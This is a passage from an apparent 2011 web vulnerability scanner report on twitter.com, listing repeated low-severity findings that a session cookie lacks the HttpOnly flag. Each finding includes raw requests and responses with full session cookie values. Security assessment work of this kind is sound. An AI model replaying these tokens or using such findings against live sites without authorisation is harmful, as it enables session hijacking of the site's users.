Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.68. http://twitter.com/Trackgals

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Trackgals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Trackgals HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265994-35762-9331
ETag: "084cf3c9b164746f0254081f5cf026a3"
Last-Modified: Sat, 29 Jan 2011 01:53:14 GMT
X-Runtime: 0.00950
Content-Type: text/html; charset=utf-8
Content-Length: 52317
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.69. http://twitter.com/Trackgals/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Trackgals/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Trackgals/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265281-91506-33293
ETag: "1be6fcf55b971925b5829f3dff23d7be"
Last-Modified: Sat, 29 Jan 2011 01:41:21 GMT
X-Runtime: 0.00823
Content-Type: text/html; charset=utf-8
Content-Length: 52701
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.70. http://twitter.com/_juliannemoore

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /_juliannemoore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_juliannemoore HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-32409-42560
ETag: "1befeb7740b62870da7fe07d809fb4d6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.01153
Content-Type: text/html; charset=utf-8
Content-Length: 34492
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.71. http://twitter.com/about

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-81361-59906
ETag: "ab332c29e3804246af65d489155e144e"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.18722
Content-Type: text/html; charset=utf-8
Content-Length: 15164
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlZThlMDExYjJmNmQzODczNjgwYWY4M2RiNzlhYTY5%250ANGU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5f458640ebcf7c125bea2d557117ee384f19570f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.72. http://twitter.com/about/contact

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /about/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contact HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225078-5855-53327
ETag: "ee4327c585f1140407cbc5106769d4eb"
Last-Modified: Fri, 28 Jan 2011 14:31:18 GMT
X-Runtime: 0.02946
Content-Type: text/html; charset=utf-8
Content-Length: 10974
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzdiYmUxOThjZjIyNjY2YTgzMWVkNmZlNmEwM2Yw%250AMDI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--da3a7d4f9fbdbbc32b992a2ee93c9facd042300f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.73. http://twitter.com/about/resources

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /about/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/resources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3941-56167
ETag: "b3415b3a1e4db6b10e96993fd3ced6dd"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.02948
Content-Type: text/html; charset=utf-8
Content-Length: 12672
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTdlYjkyMDk3OTcwMTQxNTFlMjM2ZmE3YmE4ODJj%250ANmM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--5ad46e0e7e340cae0b9f7ca2011b39284030c689; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.74. http://twitter.com/account/complete

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /account/complete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/complete HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-66922-55667
ETag: "eedf9b80f78cbd1a5f2a1c6e52bbc763"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.03729
Content-Type: text/html; charset=utf-8
Content-Length: 9562
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlODI5MmUyYjNjZTVmMGNlMzU4NGJlM2JjNGVkMTQ1%250AYTA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--9ac191e704e10670dc258c58c1b2e5f1e8b10885; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.75. http://twitter.com/account/profile_image/malsup

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /account/profile_image/malsup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/profile_image/malsup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup
X-Runtime: 0.00294
Content-Type: text/html; charset=utf-8
Content-Length: 147
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIjRodHRwOi8vdHdpdHRlci5jb20vYWNjb3VudC9w%250Acm9maWxlX2ltYWdlL21hbHN1cDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0%250AYWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFz%250AaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--efeb79c67fc2a12bf68668d2c6c44713e044d3b4; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:30:36 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Faccount%2Fprofile_image%2Fmalsup">redirected</a>.</body></html>

11.76. http://twitter.com/account/resend_password

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /account/resend_password

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /account/resend_password HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224738-99420-18584
ETag: "f922c6202d9a9e6c0d31ac6afdb14eff"
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
X-Runtime: 0.02589
Content-Type: text/html; charset=utf-8
Content-Length: 9745
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlMDI3MTAzYTcyMjcyM2VhZDQyN2NiOGRlNTEyNWE5%250AZTc6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--c7b8267380c61b856a14710cd449961d09a51a3c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.77. http://twitter.com/ajpiano

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ajpiano

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajpiano HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-9839-24776
ETag: "6cfb51a84c8ef82cfc30accecbfd12df"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01348
Content-Type: text/html; charset=utf-8
Content-Length: 48953
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.78. http://twitter.com/androidnewsblog

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /androidnewsblog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /androidnewsblog HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
